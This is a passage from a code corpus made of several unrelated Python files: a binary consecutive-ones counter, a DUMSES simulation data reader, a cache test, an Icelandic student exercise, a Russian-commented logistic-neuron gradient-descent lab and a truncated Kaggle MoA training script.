\")))\n\nconfigurator.save_updated_config()\n","sub_path":"bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"566706544","text":"import sys\n\ndef incr_cntr(a , b):\n print(\"b \" , a)\n if len(a) >= 2:\n for i in range(len(a)-1):\n if a[i] == \"1\" and a[i+1] == \"1\":\n b += 1\n b = incr_cntr(a[i+2:] , b)\n break\n return b\n\n\ndec_num = int(input().strip())\nbin_num = bin(dec_num)\nresult = 0\nresult = incr_cntr(list(bin_num), result)\nprint(\"result = \",result)\n","sub_path":"ConsecutiveOnes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"151955256","text":"import tables \nimport numpy as np \nimport pylab as pl\nimport glob\n\nclass DumsesSides:\n \"\"\" Extract data from the sides of DUMSES simulation \n Usage: data = DumsesSides(ispec, type=type)\n with:\n - ispec: index of the 'special' output\n - type : 'sequential', 'collective_hdf5' or 'collective_mpi' as for the 'store_sides' variable in DUMSES\n\n data is an object with:\n - data.side[a][i], with a in (x,y,z) and i in (1,2)\n each data.side[a][i] contains the 4 variables: rho, E, rhou & B\n\n Optional arguments:\n - filedir: path of the directory containing the 'special' directories\n - nbuf : number of ghost cells\"\"\"\n\n def __init__(self, ispec=1, filedir='./', nvar=8, nbuf=3, type='sequential'):\n self.ispec = ispec\n self.filedir = filedir\n if(type=='sequential'):\n # Define files to read and retrieve basic informations\n fsidex = fsideSeq(ispec=ispec, filedir=filedir, direction='x')\n fsidey = fsideSeq(ispec=ispec, filedir=filedir, direction='y')\n fsidez = fsideSeq(ispec=ispec, filedir=filedir, direction='z')\n self.npes = int(np.sqrt(fsidex.nsq*fsidey.nsq*fsidez.nsq))\n self.nxslice = self.npes/fsidex.nsq\n self.nyslice = self.npes/fsidey.nsq\n self.nzslice = self.npes/fsidez.nsq\n\n nxslice = self.nxslice \n nyslice = self.nyslice\n nzslice = self.nzslice\n \n # Retrieve color and key values in each direction to organize thread files\n colorx = []; colory = []; colorz = []\n keyx = []; keyy = []; keyz = []\n for mype in range(self.npes):\n colorx.append(mype%nxslice)\n colory.append((mype/(nxslice*nzslice))%nyslice)\n colorz.append((mype/nxslice)%nzslice)\n keyx.append(mype/nxslice)\n keyy.append(mype%(nxslice*nzslice))\n keyz.append(colory[mype]*nxslice \\\n + (mype-colorz[mype]*nxslice)%nxslice)\n\n tfx = tables.openFile(fsidex.listtop[0])\n self.ny = tfx.root.rho.shape[1] - 2*nbuf\n self.nz = tfx.root.rho.shape[0] - 2*nbuf\n tfx.close()\n tfy = tables.openFile(fsidey.listtop[0])\n self.nx = tfy.root.rho.shape[1] - 2*nbuf\n tfy.close()\n \n # Create sides in each direction\n self.sidex1 = sideSeq(fsidex.listtop, self.ny, self.nz \\\n , nyslice, nzslice, keyx, 'x', nbuf)\n self.sidex2 = sideSeq(fsidex.listbot, self.ny, self.nz \\\n , nyslice, nzslice, keyx, 'x', nbuf)\n self.sidey1 = sideSeq(fsidey.listtop, self.nx, self.nz \\\n , nxslice, nzslice, keyy, 'y', nbuf)\n self.sidey2 = sideSeq(fsidey.listbot, self.nx, self.nz \\\n , nxslice, nzslice, keyy, 'y', nbuf)\n self.sidez1 = sideSeq(fsidez.listtop, self.nx, self.ny \\\n , nxslice, nyslice, keyz, 'z', nbuf)\n self.sidez2 = sideSeq(fsidez.listbot, self.nx, self.ny \\\n , nxslice, nyslice, keyz, 'z', nbuf)\n \n elif(type=='collective_hdf5'):\n filerep = filedir + 'special_%06d/' %ispec\n fside = tables.openFile(filerep + 'sides.000000')\n\n # Retrieve basic informations\n self.nx = fside.root.para_int[0]\n self.ny = fside.root.para_int[1]\n self.nz = fside.root.para_int[2]\n self.nxslice = fside.root.para_int[3]\n self.nyslice = fside.root.para_int[4]\n self.nzslice = fside.root.para_int[5]\n self.dim = fside.root.para_int[0:3]\n self.slice = fside.root.para_int[3:6]\n \n nglob = self.dim*self.slice\n\n # Create sides in each direction\n self.sidex1 = sideColHDF(fside, nglob, side='x', nside=1, nbuf=nbuf)\n self.sidex2 = sideColHDF(fside, nglob, side='x', nside=2, nbuf=nbuf)\n self.sidey1 = sideColHDF(fside, nglob, side='y', nside=1, nbuf=nbuf)\n self.sidey2 = sideColHDF(fside, nglob, side='y', nside=2, nbuf=nbuf)\n self.sidez1 = sideColHDF(fside, nglob, side='z', nside=1, nbuf=nbuf)\n self.sidez2 = sideColHDF(fside, nglob, side='z', nside=2, nbuf=nbuf)\n\n fside.close()\n\n elif(type=='collective_mpi'):\n filerep = filedir + 'special_%06d/' %ispec\n fsidex1 = tables.openFile(filerep + 'sides.000001')\n fsidex2 = tables.openFile(filerep + 'sides.000002')\n fsidey1 = tables.openFile(filerep + 'sides.000003')\n fsidey2 = tables.openFile(filerep + 'sides.000004')\n fsidez1 = tables.openFile(filerep + 'sides.000005')\n fsidez2 = tables.openFile(filerep + 'sides.000006')\n\n # Create sides in each direction\n self.sidex1 = sideColMPI(fsidex1)\n self.sidex2 = sideColMPI(fsidex2)\n self.sidey1 = sideColMPI(fsidey1)\n self.sidey2 = sideColMPI(fsidey2)\n self.sidez1 = sideColMPI(fsidez1)\n self.sidez2 = sideColMPI(fsidez2)\n\n fsidex1.close(); fsidex2.close()\n fsidey1.close(); fsidey2.close()\n fsidez1.close(); fsidez2.close()\n\n else:\n print(\"Wrong type!\\n'type' should be equal to 'sequential', 'collective_hdf5' or 'collective_mpi'.\")\n return\n\n# Classes for sequential dump of the sides\nclass fsideSeq:\n def __init__(self, ispec=1, filedir='./', direction='x'):\n # Define directory for the given direction\n filerep = filedir + 'special_%06d/' %ispec\n if(direction=='x'): filerep = filerep + 'sidex/'\n if(direction=='y'): filerep = filerep + 'sidey/'\n if(direction=='z'): filerep = filerep + 'sidez/'\n\n # Create lists of the files of the sides in the given direction\n self.listtop = np.sort(glob.glob(filerep + 'side*1.*'))\n self.listbot = np.sort(glob.glob(filerep + 'side*2.*'))\n self.nsq = len(self.listtop)\n\nclass sideSeq:\n def __init__(self, listf, nx, ny, nxslice, nyslice, key, direction, nbuf):\n # Initialize arrays\n rho = np.zeros((nx*nxslice, ny*nyslice))\n rhoux = np.zeros((nx*nxslice, ny*nyslice))\n rhouy = np.zeros((nx*nxslice, ny*nyslice))\n rhouz = np.zeros((nx*nxslice, ny*nyslice))\n E = np.zeros((nx*nxslice, ny*nyslice))\n Bx = np.zeros((nx*nxslice, ny*nyslice))\n By = np.zeros((nx*nxslice, ny*nyslice))\n Bz = np.zeros((nx*nxslice, ny*nyslice))\n\n for i in range(nxslice*nyslice):\n mype = int(listf[i].split('.')[-1])\n pos = key[mype]\n # Index in the global array for each thread file\n if(direction=='x'):\n i0 = (pos/nyslice)*nx; i1 = (pos/nyslice + 1)*nx\n j0 = (pos%nyslice)*ny; j1 = (pos%nyslice + 1)*ny\n else:\n i0 = (pos%nxslice)*nx; i1 = (pos%nxslice + 1)*nx\n j0 = (pos/nxslice)*ny; j1 = (pos/nxslice + 1)*ny\n\n # Open the file and retrieve data\n f = tables.openFile(listf[i])\n rho[i0:i1,j0:j1] = np.transpose(f.root.rho[nbuf:ny+nbuf,nbuf:nx+nbuf])\n rhoux[i0:i1,j0:j1] = np.transpose(f.root.rho_vx[nbuf:ny+nbuf,nbuf:nx+nbuf])\n rhouy[i0:i1,j0:j1] = np.transpose(f.root.rho_vy[nbuf:ny+nbuf,nbuf:nx+nbuf])\n rhouz[i0:i1,j0:j1] = np.transpose(f.root.rho_vz[nbuf:ny+nbuf,nbuf:nx+nbuf])\n Bx[i0:i1,j0:j1] = np.transpose(f.root.Bx[nbuf:ny+nbuf,nbuf:nx+nbuf])\n By[i0:i1,j0:j1] = np.transpose(f.root.By[nbuf:ny+nbuf,nbuf:nx+nbuf])\n Bz[i0:i1,j0:j1] = np.transpose(f.root.Bz[nbuf:ny+nbuf,nbuf:nx+nbuf])\n E[i0:i1,j0:j1] = np.transpose(f.root.E[nbuf:ny+nbuf,nbuf:nx+nbuf])\n f.close()\n\n self.rho = rho\n self.E = E\n self.rhou = np.transpose(np.array([rhoux,rhouy,rhouz]), (1,2,0))\n self.B = np.transpose(np.array([Bx,By,Bz]), (1,2,0))\n\n# Classes for collective dump of the sides using PHDF5\nclass sideColHDF:\n def __init__(self, fside, dim, side='x', nside=1, nbuf=3):\n # Define the selection depending on the selected side\n if(side == 'x'):\n rside = fside.root.side_x\n nxglob = dim[1]\n nyglob = dim[2]\n elif(side == 'y'):\n rside = fside.root.side_y\n nxglob = dim[0]\n nyglob = dim[2]\n elif(side == 'z'):\n rside = fside.root.side_z\n nxglob = dim[0]\n nyglob = dim[1]\n selx = [i+nbuf for i in range(nxglob)]\n sely = [i+nbuf for i in range(nyglob)]\n\n ndim = 3\n self.rhou = np.zeros((nxglob,nyglob,ndim))\n self.B = np.zeros((nxglob,nyglob,ndim))\n\n # Retrieve data\n rho = np.transpose(rside.rho[nside-1])\n self.rho = rho[selx,:][:,sely]\n E = np.transpose(rside.E[nside-1])\n self.E = E[selx,:][:,sely]\n rhoux = np.transpose(rside.rho_vx[nside-1])\n self.rhou[:,:,0] = rhoux[selx,:][:,sely]\n rhouy = np.transpose(rside.rho_vy[nside-1])\n self.rhou[:,:,1] = rhouy[selx,:][:,sely]\n rhouz = np.transpose(rside.rho_vz[nside-1])\n self.rhou[:,:,2] = rhouz[selx,:][:,sely]\n Bx = np.transpose(rside.Bx[nside-1])\n self.B[:,:,0] = Bx[selx,:][:,sely]\n By = np.transpose(rside.By[nside-1])\n self.B[:,:,1] = By[selx,:][:,sely]\n Bz = np.transpose(rside.Bz[nside-1])\n self.B[:,:,2] = Bz[selx,:][:,sely]\n\n# Classes for collective dump of the sides using MPI\nclass sideColMPI:\n def __init__(self, fside):\n # Retrieve data\n self.rho = np.transpose(fside.root.rho[:])\n self.E = np.transpose(fside.root.E[:])\n rhoux = np.transpose(fside.root.rho_vx[:])\n rhouy = np.transpose(fside.root.rho_vy[:])\n rhouz = np.transpose(fside.root.rho_vz[:])\n self.rhou = np.transpose([rhoux,rhouy,rhouz], (1,2,0))\n Bx = np.transpose(fside.root.Bx[:])\n By = np.transpose(fside.root.By[:])\n Bz = np.transpose(fside.root.Bz[:])\n self.B = np.transpose([Bx,By,Bz], (1,2,0))\n","sub_path":"dumpy_v05/data/rd_side.py","file_name":"rd_side.py","file_ext":"py","file_size_in_byte":10487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"210407415","text":"from Cache import Cache\nimport random\n\nif __name__ == '__main__':\n\n # Test the cache\n Keys = [i for i in range(7)] # Total Entries\n sites = ['www.google.com ', 'www.yahoo.com ', 'www.goal.com ', 'www.mozilla.com ',\n 'www.immigration.ca ', 'www.Ebay.com ', 'www.amazon.com ', 'www.google.com ',\n 'www.espn.com ', 'www.natgeo.com ', 'www.BBCEarth.com ']\n\n # Cache object\n cache = Cache()\n\n print('_'*30)\n # Updating Cache with entries\n for i, key in enumerate(Keys):\n if key in cache:\n continue\n else:\n value = ''.join([random.choice(sites)])\n print('\\t', value)\n cache.update(key, value)\n\n print(\"{0}.Iteration, #{1} cached entries\" .format(i+1, cache.size()))\n\n # Cache List\n print('\\n\\n\\t', '*'*10, ' CACHE LIST ', '*'*10)\n for k, v in cache.view().items():\n print(\"{0} : {1}\".format(k, v))\n print('_' * 60)\n","sub_path":"Q3. Cache/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"239039604","text":"#Höfundur Einar Karl\n#Dags. 21/2/2019\nimport random\n#Def\n#1:\ndef prentaTuple(tup):\n for x in tup:#Fer í gegnum tuple\n print(x, end=\" \")#og prentar innihaldið(x) með bili á milli\ndef paraRod(tup1, tup2):\n for x in range(len(tup1)):#Keyrir í gegnum tuple eins og oft og len af því er\n print(tup1[x],\"og\",tup2[x]) #Prentar tuple1 og tuple2 í hvert sinn\ndef paraRandom(tup1, tup2):\n for x in range(len(tup1)):#Keyrir í gegnum tuple eins og oft og len af því er\n print(random.choice(tup1),\"og\",random.choice(tup2))#Prentar random úr tuple 1 og 2 saman\ndef paraRandomStakur(tup1, tup2):\n t1=list(range(len(tup1)))#Gerir lista af len úr tuple1\n for x in range(len(t1)):#Keyrir í gegnum listan eins og oft og len af því er\n print(tup1[x],\"og\",tup2[x])#Prentar x úr tup 1 og 2\ndef finnaNafn(stafur, tup):\n l=[] #Skilgreini lista\n for x in tup: #Fer í gegnum tup\n if x.count(stafur):#Ef stafur er í tup\n l.append(x) #Setur x í listan\n return l #Skilar listanum\ndef fyrstiStafur(stafur, tup):\n l=[] #Skilgreinir lista\n for x in tup: #Fer í gegnum tup\n if x[0]==stafur: #Ef fyrsti stafurinn er sami og stafur:\n l.append(x) #Setur x í listann\n return l #Skilar listanum\ndef finnaN(tup1, tup2):\n l=[] #Skilgreinir lista\n for x in tup1: #Fer í gegnum tup1\n if x.count(\"n\")>1: #ef stafurinn 'n' er :\n l.append(x) #Setur x í lista\n for x in tup2:#Sama nema í tup2 en setur í sama lista\n if x.count(\"n\")>1:\n l.append(x)\n return l #Skilar listanum\n#2:\ndef dictNafn(nafn, dict):\n if nafn in dict: #Ef nafn er í dict:\n print(\"Símanúmerið er:\",dict.get(nafn)) #Prentar símanúmerið\n else: #Skilar þessu frá sér ef nafnið er ekki í dict\n print(\"Þetta nafn er ekki til í skránni\")\n#3:\ndef prentaDict(dict):\n print(\"Allir nemendur:\")#Prentar þetta\n for x in dict: #Fer í gegnum dict\n print(x,\"--------\",dict[x]) #Prentar key(x) og value(dict[x])\ndef dict18(dict):\n listi=[] #Skilgreinir lista\n print(\"Allir nemendur sem eru orðnir 18:\") #Prentar þetta\n for x in dict: #Fer í gegnum dict\n if dict[x] >= 18: #Ef gildi er meira eða jafnt og 18:\n listi.append(dict[x]) #Setur gildi í listann\n print(x, \"--------\", dict[x]) #Prentar key(x) og value(dict[x])\n print(\"Fjöldi nemenda sem eru orðnir 18 er\",len(listi)) #Prentar þetta með fjölda listans (len)\ndef medalDict(dict):\n listi=[] #Skilgreinir lista\n for x in dict: #Fer í gegnum dict\n listi.append(dict[x]) #Setur gildi í lista\n medaltal=float(sum(listi)/len(listi)) #Reiknar meðaltal gildana með listanum\n print(\"Meðalaldur bekkjarins er:\",round(medaltal,2)) #Sýnir meðalaldur með 2 aukastöfum\ndef heildDict(dict):\n listi=[] #Skilgreinir lista\n for x in dict: #Fer í gegnum dict\n listi.append(dict[x])#Setur gildin í listann\n print(\"Heildaraldur allra í bekknum er:\",sum(listi)) #Finnur summu listans (gildana)\ndef stafurDict(stafur, dict):\n l=[]#Skilgreinir lista\n for x in dict: #Fer í gegnum dict\n if x[0]==stafur:#Ef fyrsti stafurinn er sá sami og stafur:\n print(x, \"--------\", dict[x]) #Prentar key(x) og value(dict[x])\n l.append(dict[x])#Setur gildið í listann\n return l #Skilar listanum\ndef medalDictStafur(l):\n medaltal = float(sum(l) / len(l))#Reiknar meðaltal af lista\n return round(medaltal, 2) #Skilar meðaltalinu með 2 aukastöfum\n#Tuple:\nherraTuple=(\"Jón\",\"Jóngeir\",\"Arnar\",\"Halli\",\"Gunnar\",\"Gústi\")\ndomuTuple=(\"Jónína\",\"Jónun\",\"Arna\",\"Halla\",\"Gunna\",\"Gústa\")\n#Valmynd:\nval=\" \"\nwhile val !=\"4\":\n print(\"1. Danspörin\")\n print(\"2. Símaskrá\")\n print(\"3. Skráning í bekk\")\n print(\"4. Hætta\")\n val=input(\"Veldu 1-3 eða 4 til að hætta \")\n if val==\"1\":\n print(\"Herra tuple er:\")\n prentaTuple(herraTuple)\n print()#Vantaði bil\n print(\"Dömu tuple er:\")\n prentaTuple(domuTuple)\n print(\"\") #Vantaði annað bil\n print(\"Pöruð saman í röð:\")\n paraRod(herraTuple, domuTuple)\n print(\"Pöruð saman af handahófi:\")\n paraRandom(herraTuple, domuTuple)\n kk=random.sample(herraTuple,len(herraTuple)) #Tekur random úr tuple en tekur ekki sama aftur\n kvk=random.sample(domuTuple,len(domuTuple)) #Sama og uppi\n print(\"Pöruð af handahófi en stakt:\")\n paraRandomStakur(kk,kvk)\n stafur=input(\"Sláðu inn staf: \")\n print(\"Hér eru herra nöfn með stafnum\",stafur+\":\",finnaNafn(stafur, herraTuple))\n print(\"Hér eru dömu nöfn með stafnum\",stafur+\":\",finnaNafn(stafur, domuTuple))\n fyrsti=input(\"Sláðu inn fyrsta staf: \")\n print(\"Hér eru herra nöfn með stafnum\",fyrsti,\"sem fyrsta staf:\",fyrstiStafur(fyrsti,herraTuple))\n print(\"Hér eru dömu nöfn með stafnum\",fyrsti, \"sem fyrsta staf:\", fyrstiStafur(fyrsti, domuTuple))\n print(\"Nöfn sem eru með meira en eitt n:\",finnaN(herraTuple, domuTuple))\n elif val==\"2\":\n dict = {'Einar Karl':6948820,'Guðmundur':8411350,'Geir':6117573, 'Gabríel':8552428,'Róbert':8210601,'Brynjar':6960925,'Trausti':8416950,'Gabríel Elí':8441477,'Eydís':6643103,'Pétur':8992307}\n nafn = input(\"Sláðu inn nafn \")\n dictNafn(nafn, dict)\n elif val==\"3\":\n bekkjaDict={'Einar':16,'Gummi':16,'Jónas':19,'Jens':18,'Jóngeir':19,'Brynjar':17,'Trausti':18,'Róbert':17,'Geir':16,'Gabríel':17,'Dagný':16,'Guðrún':20,'Sigríður':21,'Líney':15,'Eydís':21}\n prentaDict(bekkjaDict)\n dict18(bekkjaDict)\n medalDict(bekkjaDict)\n heildDict(bekkjaDict)\n stafur=input(\"Sláðu inn staf \")\n listi=(stafurDict(stafur, bekkjaDict))\n print(\"Meðaldur þeirra er: \",medalDictStafur(listi))\n elif val==\"4\":\n print(\"Ókei bæ\")\n else:\n print(\"Rangur Innsláttur\")","sub_path":"_site/Forritun/Forritun 2/Skilaverkefni 3.py","file_name":"Skilaverkefni 3.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"323591164","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 22 21:30:32 2021\n\n@author: AM4\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Считываем данные \n# df = pd.read_csv('https://archive.ics.uci.edu/ml/'\n# 'machine-learning-databases/iris/iris.data', header=None)\n\ndf = pd.read_csv('data.csv')\n\n# df.to_csv('data_err.csv', index=None)\n \n# возьмем перые 100 строк, 4-й столбец \ny = df.iloc[0:100, 4].values\n\n# так как ответы у нас строки - нужно перейти к численным значениям\ny = np.where(y == \"Iris-setosa\", 1, 0)\n\n# возьмем два признака, чтобы было удобне визуализировать задачу\nX = df.iloc[0:100, [0, 2]].values\n\n# добавим фиктивный признак для удобства матричных вычслений\nX = np.concatenate([np.ones((len(X),1)), X], axis = 1)\n\n# Признаки в X, ответы в y - постмотрим на плоскости как выглядит задача (y==1)\nplt.figure\nplt.scatter(X[0:50, 1], X[0:50, 2], color='red', marker='o')\nplt.scatter(X[50:100, 1], X[50:100, 2], color='blue', marker='x')\n\n# функцию нейрора из первой работы дополним функцией активации:\n# значение = f(w1*признак1+w2*признак2+w0)\n# f = 1/(1-exp(-x))\n\n# начальные значения весов зададим пока произвольно\nw = np.array([0, 0.1, 0.4])\n# сам нейрон запишем в виде одной строки\npredict = 1/(1+np.exp(-np.dot(X[1], w)))\n\n\n# gradient decent \nN=len(X)\n# инициализируем веса случайными числами, задаем скорость обучения \n# и параметр сглаживания функционала качества\nw=np.random.random((X.shape[1]))\nnu = 0.5\nlambd = 1\n\ncosts=[0] # тут будем хранить информацию об ошибке для построения графика\nw_iter = []\n\nfor i in range(100): # пока просто сделаем какое-то количество итераций\n \n # делаем начальное предсказание \n y_pred = 1/(1+np.exp(-np.dot(X, w)))\n \n #и оценку функционала качества обучения\n cost = (1/N)*np.sum((y_pred-y)**2)\n \n #вычисляем градиент\n dw=(2/N)*np.dot((y_pred-y),X)\n \n #обновляем веса\n w = w - nu * dw\n #записываем результат в список\n costs.append((1-lambd)*costs[-1]+lambd*cost) \n\n# строим результат на графике\nplt.figure\nplt.plot(costs)\n\n# вычислим ошибку на обучающей выборке\ny_pred = 1/(1+np.exp(-np.dot(X, w)))\nprint(sum(abs((y_pred>0.5)-y)))\n\n# и на полной выборке\ny_all = df.iloc[:, 4].values\ny_all = np.where(y_all == \"Iris-setosa\", 1, 0)\nX_all = df.iloc[:, [0, 2]].values\nX_all = np.concatenate([np.ones((len(X_all),1)), X_all], axis = 1)\ny_pred = 1/(1+np.exp(-np.dot(X_all, w)))\nprint(sum(abs((y_pred>0.5)-y_all)))\n\n\n# посмотрим как выглядит зависимость функционала ошибки от значений весов\n\n# созд��дим сетку параметров (весов)\nw1 = np.arange(-2,2,0.1)\nw2 = np.arange(-2,2,0.1)\nW1, W2 = np.meshgrid(w1, w2)\n\n# напишем функцию вычисления функционала ошибок так, чтобы она работала на сетке \n# w0 будет зафиксирован, w1 и w2 изменяются\ndef cost_func(X, y, W1, W2):\n cost = np.zeros(W1.shape)\n for i in range(W1.shape[0]):\n for j in range(W1.shape[1]):\n y_pred = 1/(1+np.exp(-np.dot(X, np.array([-1, W1[i,j], W2[i,j]]))))\n cost[i,j] = (1/N)*np.sum((y_pred-y)**2)\n return cost\n\n\n# строим зависимость в 3d\nfrom mpl_toolkits import mplot3d\nС = cost_func(X, y, W1, W2) # ситаем функционал ошибк на сетке весов\nfig = plt.figure()\nax = plt.axes(projection=\"3d\")\nax.plot_wireframe(W1, W2, С, color='green') # строим \"каркас\"\nax.plot_surface(W1, W2, С, rstride=1, cstride=1,\n cmap='winter', edgecolor='none') # делаем заливку поверхности\nax.set_xlabel('w1')\nax.set_ylabel('w2')\nax.set_zlabel('cost')\nplt.show()\n\n# stochastic gradient decent \nN=len(X)\nw=np.random.random((X.shape[1]))\nnu = 1\nlambd = 1\n\ncosts=[0.5]\nw_iter = []\n\nfor i in range(2): # теперь корректировку веса делаем после каждого примера\n # перебираем примеры в выборке, но т.к. примеры нужно выбирать случайно \n # перемешаем выборку \n new_ind = np.random.permutation(N)\n X = X[new_ind]\n y = y[new_ind]\n for x,ytarget in zip(X,y):\n \n y_pred = 1/(1+np.exp(-np.dot(x, w)))\n cost = (1/N)*np.sum(((1/(1+np.exp(-np.dot(X, w))))-y)**2)\n \n #вычисляем градиент\n dw=np.dot((y_pred-ytarget),x)\n \n #обновляем веса\n w = w - nu * dw\n #записываем результат в список\n costs.append((1-lambd)*costs[-1]+lambd*cost) \n\n# строим результат на графике\nplt.figure\nplt.plot(costs)\n\n# вычислим ошибку на обучающей выборке\ny_pred = 1/(1+np.exp(-np.dot(X, w)))\nprint(sum(abs((y_pred>0.5)-y)))\n\n# и на полной выборке\ny_pred = 1/(1+np.exp(-np.dot(X_all, w)))\nprint(sum(abs((y_pred>0.5)-y_all)))\n\n","sub_path":"lab2_sgd/lab2_neuron_sdg.py","file_name":"lab2_neuron_sdg.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"184918377","text":"import pandas as pd\nimport numpy as np\nimport warnings\nimport gc, os\nfrom time import time\nimport datetime, random\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import KFold, StratifiedKFold, GroupKFold\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.feature_selection import VarianceThreshold\nfrom sklearn.preprocessing import QuantileTransformer\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, TensorDataset, DataLoader, RandomSampler\n\nfrom iterstrat.ml_stratifiers import MultilabelStratifiedKFold\n\nimport argparse\nimport utils\nimport logging\n\n# Model\nimport model.shiji \nfrom model.shiji import SmoothBCEwLogits\nfrom model.shiji import Model\nfrom model.shiji import MoADataset\nfrom model.shiji import resnetsimpleModel\nfrom model.shiji import resnetModel\nfrom model.shiji import TestDataset\n\ndef Feature(df):\n transformers={}\n for col in (genes+cells):\n transformer = QuantileTransformer(n_quantiles=100, random_state=0, output_distribution='normal')\n transformer.fit(df[:train.shape[0]][col].values.reshape(-1, 1))\n df[col] = transformer.transform(df[col].values.reshape(-1, 1)).reshape(1, -1)[0]\n transformers[col]=transformer\n gene_pca = PCA(n_components = ncompo_genes, \n random_state = 42).fit(df[genes])\n pca_genes = gene_pca.transform(df[genes])\n cell_pca = PCA(n_components = ncompo_cells, \n random_state = 42).fit(df[cells])\n pca_cells = cell_pca.transform(df[cells])\n pca_genes = pd.DataFrame(pca_genes, columns = [f\"pca_g-{i}\" for i in range(ncompo_genes)])\n pca_cells = pd.DataFrame(pca_cells, columns = [f\"pca_c-{i}\" for i in range(ncompo_cells)])\n df = pd.concat([df, pca_genes, pca_cells], axis = 1)\n for col in ['cp_time', 'cp_dose']:\n tmp = pd.get_dummies(df[col], prefix=col)\n df = pd.concat([df, tmp], axis=1)\n df.drop([col], axis=1, inplace=True)\n return df, transformers, gene_pca, cell_pca\n\ndef Ctl_augment(train, target, include_test=0):\n if include_test==0:\n ctl_aug=ctl_train2.copy()\n if include_test==1:\n ctl_aug=ctl_train.copy()\n aug_trains = []\n aug_targets = []\n for _ in range(3):\n train1 = train.copy()\n target1 = target.copy()\n ctl1 = ctl_train.sample(train1.shape[0], replace=True).reset_index(drop=True)#.loc[(ctl_train['cp_time']==t)&(ctl_train['cp_dose']==d)]\n ctl2 = ctl_train.sample(train1.shape[0], replace=True).reset_index(drop=True)\n\n ctl3 = ctl_train.sample(train1.shape[0], replace=True).reset_index(drop=True)#.loc[(ctl_train['cp_time']==t)&(ctl_train['cp_dose']==d)]\n ctl4 = ctl_train.sample(train1.shape[0], replace=True).reset_index(drop=True)\n mask_index1 = list(np.random.choice(ctl3.index.tolist(), int(ctl3.shape[0]*0.4), replace=False))\n ctl3.loc[mask_index1, genes+cells] = 0.0\n ctl4.loc[mask_index1, genes+cells] = 0.0\n\n ctl5 = ctl_train.sample(train1.shape[0], replace=True).reset_index(drop=True)#.loc[(ctl_train['cp_time']==t)&(ctl_train['cp_dose']==d)]\n ctl6 = ctl_train.sample(train1.shape[0], replace=True).reset_index(drop=True)\n mask_index2 = list(np.random.choice(list(set(ctl5.index)-set(mask_index1)), int(ctl5.shape[0]*0.3), replace=False))\n ctl5.loc[mask_index1+mask_index2, genes+cells] = 0.0\n ctl6.loc[mask_index1+mask_index2, genes+cells] = 0.0\n\n train1[genes+cells] = train1[genes+cells].values + ctl1[genes+cells].values - ctl2[genes+cells].values \\\n + ctl3[genes+cells].values - ctl4[genes+cells].values + ctl5[genes+cells].values - ctl6[genes+cells].values\n\n aug_train = train1.merge(target1, how='left', on='sig_id')\n aug_trains.append(aug_train[['cp_time', 'cp_dose']+genes+cells])\n aug_targets.append(aug_train[targets])\n\n df = pd.concat(aug_trains).reset_index(drop=True)\n target = pd.concat(aug_targets).reset_index(drop=True)\n for col in (genes+cells):\n df[col] = transformers[col].transform(df[col].values.reshape(-1, 1)).reshape(1, -1)[0]\n pca_genes = gene_pca.transform(df[genes])\n pca_cells = cell_pca.transform(df[cells])\n pca_genes = pd.DataFrame(pca_genes, columns = [f\"pca_g-{i}\" for i in range(ncompo_genes)])\n pca_cells = pd.DataFrame(pca_cells, columns = [f\"pca_c-{i}\" for i in range(ncompo_cells)])\n df = pd.concat([df, pca_genes, pca_cells], axis = 1)\n\n #nor_var_col = [col for col in df.columns if col in ['sig_id', 'cp_type', 'cp_time', 'cp_dose'] or '_gt_' in col or '_lt_' in col]\n #var_cols = [col for col in df.columns if col not in ['sig_id', 'cp_type', 'cp_time', 'cp_dose'] and '_gt_' not in col and '_lt_' not in col]\n #var_data = var_thresh.transform(df[var_cols])\n #df = pd.concat([df[nor_var_col], pd.DataFrame(var_data)], axis=1)\n\n for col in ['cp_time', 'cp_dose']:\n tmp = pd.get_dummies(df[col], prefix=col)\n df = pd.concat([df, tmp], axis=1)\n df.drop([col], axis=1, inplace=True)\n xs = df[train_cols].values\n ys = target[targets]\n #ys_ns = target[targets_ns]\n return xs, ys#, ys_ns\n\ndef train_and_predict(features, sub, aug, folds=5, seed=817119, lr=1/90.0/3.5*3, weight_decay=1e-5/3):\n oof = train[['sig_id']]\n for t in targets:\n #oof[t] = 0.0\n oof.loc[:,t] = 0.0\n preds = []\n test_X = test[features].values\n test_data_loader = DataLoader(dataset=TensorDataset(torch.Tensor(test_X))\n , batch_size=1024, shuffle=False)\n\n eval_train_loss=0\n for fold, (trn_ind, val_ind) in enumerate(MultilabelStratifiedKFold(n_splits = folds, shuffle=True, random_state=seed)\\\n .split(train, train_target[targets])):\n train_X = train.loc[trn_ind, features].values\n train_Y = train_target.loc[trn_ind, targets].values\n eval_train_Y = train_target.loc[trn_ind, targets].values\n\n eval_train_dataset = MoADataset(train_X, eval_train_Y)\n eval_train_data_loader = torch.utils.data.DataLoader(eval_train_dataset\n , batch_size=128\n , shuffle=False)\n\n valid_X = train.loc[val_ind, features].values\n valid_Y = train_target.loc[val_ind, targets].values\n\n valid_dataset = MoADataset(valid_X, valid_Y, val=1)\n valid_data_loader = torch.utils.data.DataLoader(valid_dataset\n , batch_size=1024\n , shuffle=False)\n\n aug_X, aug_Y = Ctl_augment(ori_train.loc[trn_ind]\n , train_target.loc[trn_ind]\n , include_test=1)\n train_X_ = np.concatenate([train_X, aug_X], axis=0)\n train_Y_ = np.concatenate([train_Y, aug_Y], 